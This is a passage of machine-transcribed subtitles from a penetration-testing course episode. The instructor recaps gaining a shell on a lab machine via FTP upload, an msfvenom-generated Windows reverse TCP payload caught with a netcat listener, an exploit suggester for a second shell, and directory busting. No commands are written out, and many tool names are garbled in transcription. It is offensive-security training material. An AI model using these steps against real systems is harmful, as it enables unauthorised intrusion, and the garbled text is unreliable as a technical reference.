00:26:31,400 --> 00:26:35,380 reverse DCP payload or something along those lines. 382 00:26:35,600 --> 00:26:36,380 See all these windows. 383 00:26:36,380 --> 00:26:44,300 INTERPRETER let's skip those just run a Windows reverse TCB shall reverse DCP which is right here. 384 00:26:44,360 --> 00:26:45,740 Try doing that as your payload. 385 00:26:46,340 --> 00:26:46,780 OK. 386 00:26:47,850 --> 00:26:54,440 And with that as your payload you don't have to use interpreter so what you can do is instead you can 387 00:26:54,440 --> 00:27:01,200 just say hey I'm going to use the x fly handler I'm going to say net cat NBL P I'm jealous and I'm port 388 00:27:01,460 --> 00:27:06,900 all force here and then just wait for a session to come across and that's it. 389 00:27:07,460 --> 00:27:14,150 Ok so my challenge to you is to redo this exploit using it manually as opposed to using Metis boy and 390 00:27:14,150 --> 00:27:16,730 interpreter and see what your results are. 391 00:27:16,730 --> 00:27:19,610 So a little bit of homework but that is it for this episode. 392 00:27:19,610 --> 00:27:26,270 So we we took our our scan we looked at some things and we could check real quick on the on the door 393 00:27:26,270 --> 00:27:30,430 buster like I said never ran before and it hasn't found anything and that's fine. 394 00:27:30,440 --> 00:27:35,330 It finished the request so you know it's always good to do directory busting. 395 00:27:35,330 --> 00:27:40,580 It's also good to run Nick so if this were actually a Web site we'll get to Nick too at some point. 396 00:27:40,580 --> 00:27:43,430 But if this were a Web site good to run Nick tow as well. 397 00:27:43,430 --> 00:27:50,720 Directory busting of course inspect the Web site but here it was really a parent that to a trained eye 398 00:27:50,750 --> 00:27:57,600 that FTB was the way to go because we had execution here we did a proof of concept with the dog j peg 399 00:27:58,220 --> 00:28:04,370 and then we're able to generate with MSF and I'm a payload and then execute it here and get a shell 400 00:28:05,210 --> 00:28:11,240 and then we also went in and we were able to use the s exploit suggestion and use that to get another 401 00:28:11,240 --> 00:28:11,790 shell. 402 00:28:11,900 --> 00:28:13,790 There's maybe a lot of information right. 403 00:28:13,790 --> 00:28:16,880 This is some some new tricks that I'm throwing at you. 404 00:28:17,180 --> 00:28:18,510 Please re watch the video. 405 00:28:18,530 --> 00:28:24,620 Please try it on your own as well take everything and try the manual way and then try it again this 406 00:28:24,620 --> 00:28:25,180 way as well. 407 00:28:25,180 --> 00:28:30,820 See if you can repeat all the steps I did without watching the video just using your notes. 408 00:28:30,920 --> 00:28:35,150 It's always good to have a good notebook so if you're not doing that already go ahead and start doing 409 00:28:35,150 --> 00:28:36,290 that now. 410 00:28:36,290 --> 00:28:38,290 But that is it for this lesson. 411 00:28:38,420 --> 00:28:40,720 I am TCM until the next one. 412 00:28:40,730 --> 00:28:41,380 I really do. 413 00:28:41,380 --> 00:28:42,320 Thank you for joining me.